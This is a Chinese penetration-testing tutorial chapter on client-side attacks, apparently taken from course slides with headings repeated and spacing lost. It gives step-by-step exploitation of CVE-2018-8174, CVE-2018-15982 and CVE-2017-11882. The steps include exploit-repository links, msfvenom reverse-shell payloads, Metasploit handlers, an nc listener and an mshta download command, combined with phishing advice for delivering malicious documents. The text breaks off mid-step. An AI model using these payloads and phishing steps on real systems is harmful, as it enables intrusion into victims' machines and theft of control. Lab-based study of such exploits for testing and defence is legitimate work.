第7章-7.2-客户端渗透

客户端渗透渗透测试基于Web应用系统的渗透虽然较为常见，但是除了常见的Web系统渗透测试外，还可以从客户端方面进行渗透测试攻击。前言客户端渗透简介IE浏览器远程代码执行（CVE-2018-8174）AdobeFlashPlayer远程代码执行（CVE-2018-15982）Office远程代码执行漏洞（CVE-2017-11882）客户端渗透应用软件一般有客户端/服务端（C/S）模式、浏览器/服务端（B/S）模式、纯客户端模式。普通用户在主机系统上运行的软件大部分时间处于上述模式中客户端的一方，通过互联网主动地访问远程服务端，接收并且处理来自于服务端的数据。客户端渗透攻击与上一节中所述的服务端渗透攻击有个显著不同的标志，就是攻击者向用户主机发送的恶意数据不会直接导致用户系统中的服务进程溢出，而是需要结合一些社会工程学技巧，诱使客户端用户去访问或处理这些恶意数据，从而间接导致攻击发生。客户端渗透举例浏览器/服务端模式的攻击，以常用的IE浏览器为例，攻击者发送一个访问链接给用户，该链接指向服务器上的一个恶意网页，用户访问该网页时触发安全漏洞，执行内嵌在网页中的恶意代码，导致攻击发生。

纯客户端模式的攻击，以Adobe、Office为例，攻击者通过社会工程学探测到目标用户的邮箱、即时通信账户等个人信息，将恶意文档发送给用户。用户打开文档时触发安全漏洞，运行其中的恶意代码，导致攻击发生。由此可见，客户端渗透攻击与上一节中所述的服务端渗透攻击有个显著不同的标志，就是攻击者向用户主机发送的恶意数据不会直接导致用户系统中的服务进程溢出，而是需要结合一些社会工程学技巧，诱使客户端用户去访问或处理这些恶意数据，从而间接导致攻击发生。客户端渗透为什么要进行客户端攻击？随着时代发展到了今天，在有各种WAF、防火墙的情况下，各种漏洞已经很难像过去那么好被利用了，攻击者想绕过防火墙发动攻击也不是那么容易的了。而当我们发送一个钓鱼文件到客户端上，再由客户端打开这个文件，最后客户端穿过防火墙回连到我们，此时在客户端上我们就获得了一个立足点foothold。这样的一个过程是相对而言是较为容易的，这也是为什么要进行客户端攻击。客户端渗透如何获得客户端上的立足点？1、尽可能多的了解目标环境，即做好信息收集工作2、创建一个虚拟机，使它与目标环境尽可能的一致，比如操作系统、使用的浏览器版本等等都需要保证严格一致3、攻击刚刚创建的虚拟机，这会是最好的攻击目标4、精心策划攻击方法，达到使目标认为这些攻击行为都是正常行为的效果5、将精心制作的钓鱼文件发送给目标，比如钓鱼邮件如果这五步都非常细致精心的去准备，那么攻击成功的概率会大幅提升。客户端渗透简介IE浏览器远程代码执行（CVE-2018-8174）AdobeFlashPlayer远程代码执行（CVE-2018-15982）Office远程代码执行漏洞（CVE-2017-11882）IE浏览器远程代码执行漏洞（CVE-2018-8174）InternetExplorer，是微软公司推出的一款网页浏览器，用户量极大。CVE-2018-8174这个漏洞是WindowsVBScriptEngine代码执行漏洞，由于VBScript脚本执行引擎（vbscript.dll）存在代码执行漏洞，攻击者可以将恶意的VBScript嵌入到office文件或者网站中，一旦用户不小心打开，远程攻击者可以获取当前用户权限执行脚本中的恶意代码。受影响产品：Windows7、WindowsServer2012R2、WindowsRT8.1、WindowsServer2008、WindowsServer2012、Windows8.1、WindowsServer2016、WindowsServer2008R2、Windows10、Windows10Servers。1.下载漏洞利用脚本，下载链接：/Yt1g3r/CVE-2018-8174_EXP。IE浏览器远程代码执行漏洞（CVE-2018-8174）2.进入CVE-2018-8174_EXP目录IE浏览器远程代码执行漏洞（CVE-2018-8174）3.使用python脚本生成payload。命令如下：python2CVE-2018-8174.py-u5/exploit.html-oexp.rtf-i5-p4444IE浏览器远程代码执行漏洞（CVE-2018-8174）4.Kali使用nc开启本地监听，准备接收反弹shell。IE浏览器远程代码执行漏洞（CVE-2018-8174）5.然后另开一个终端，使用python开启Web服务，端口80。命令如下：python2-mSimpleHTTPServer80IE浏览器远程代码执行漏洞（CVE-2018-8174）6.Win7虚拟机IE浏览器访问链接：5/exploit.html。访问报错，但是没关系，Kali已经获取反弹shell，攻击成功。IE浏览器远程代码执行漏洞（CVE-2018-8174）7.Kali已经获取反弹shell，攻击成功IE浏览器远程代码执行漏洞（CVE-2018-8174）客户端渗透简介IE浏览器远程代码执行（CVE-2018-8174）AdobeFlashPlayer远程代码执行（CVE-2018-15982）Office远程代码执行漏洞（CVE-2017-11882）AdobeFlashPlayer远程代码执行漏洞（CVE-2018-15982）AdobeFlashPlayer是一种广泛使用的、专有的多媒体程序播放器，它使用矢量图形的技术来最小化文件的大小以及创造节省网络带宽和下载时间的文件。因此Flash成为嵌入网页中的小游戏、动画以及图形用户界面常用的格式。CVE-2018-15982这个漏洞可以进行远程代码执行，攻击者通过网页下载、电子邮件、即时通信等渠道向受害者发送恶意构造的Office文件诱使其打开处理，可能触发漏洞在用户系统上执行任意指令获取控制。受影响产品：AdobeFlashPlayer(53及更早的版本)1.下载漏洞利用脚本，下载链接：/Ridter/CVE-2018-15982_EXPAdobeFlashPlayer远程代码执行漏洞（CVE-2018-15982）2.进入kali用户的家目录，然后进入CVE-2018-15982_EXP目录。AdobeFlashPlayer远程代码执行漏洞（CVE-2018-15982）3.利用msfvenom生成木马文件86.bin和64.bin，命令如下：msfvenom-pwindows/meterpreter/reverse_tcpLPORT=4444LHOST=5-fraw>86.binmsfvenom-pwindows/meterpreter/reverse_tcpLPORT=4444LHOST=5-fraw>64.binAdobeFlashPlayer远程代码执行漏洞（CVE-2018-15982）4.利用下载的脚本生成文件视频文件exploit.swf和网页index.html，命令如下：python2CVE_2018_15982.py-i86.bin-I64.binAdobeFlashPlayer远程代码执行漏洞（CVE-2018-15982）5.msf中设置监听，命令如下：useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetLHOST5setLPORT4444runAdobeFlashPlayer远程代码执行漏洞（CVE-2018-15982）6.然后另开一个终端，使用python开启Web服务，端口80，命令如下：python2-mSimpleHTTPServer80AdobeFlashPlayer远程代码执行漏洞（CVE-2018-15982）7.Win7虚拟机IE浏览器访问5/index.html。有时候ie浏览器会崩溃。AdobeFlashPlayer远程代码执行漏洞（CVE-2018-15982）AdobeFlashPlayer远程代码执行漏洞（CVE-2018-15982）8.kali中已经获取到shell。客户端渗透简介IE浏览器远程代码执行（CVE-2018-8174）AdobeFlashPlayer远程代码执行（CVE-2018-15982）Office远程代码执行漏洞（CVE-2017-11882）MicrosoftOffice是由Microsoft（微软）公司开发的一套基于Windows操作系统的办公软件套装，常用组件有Word、Excel、PowerPoint等。2017年11月14日，微软发布了11月份的安全补丁更新，其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞（CVE-2017-11882）。该漏洞为Office内存破坏漏洞，攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。漏洞影响版本：Office365、MicrosoftOffice2000、MicrosoftOffice2003、MicrosoftOffice2007ServicePack3、MicrosoftOffice2010ServicePack2、MicrosoftOffice2013ServicePack1、MicrosoftOffice2016。Office远程代码执行漏洞（CVE-2017-11882）1.漏洞利用脚本，下载链接：/Ridter/CVE-2017-11882Office远程代码执行漏洞（CVE-2017-11882）2.启动msfconsole，使用cve_2017_11882脚本进行攻击，具体命令如下：useexploit/windows/smb/cve_2017_11882setpayloadwindows/meterpreter/reverse_tcpsetlhost5setlport4444seturipathexprunOffice远程代码执行漏洞（CVE-2017-11882）3.然后生成目标机器的漏洞文档，进入CVE-2017-11882目录，执行以下命令：python2Command109b_CVE-2017-11882.py-c"mshta5:8080/exp"-oexp.doc上面的这个url是msf中生成的恶意文件exp的下载地址。Office远程代码执行漏洞（CVE-2017-11882）4.然后另开一个终端，使用python开启Web服务，端口80。python2-mSimpleHTTPServer80Office远程代码执行漏洞（CVE-2017-11882）5.Win7虚拟机IE浏览器访问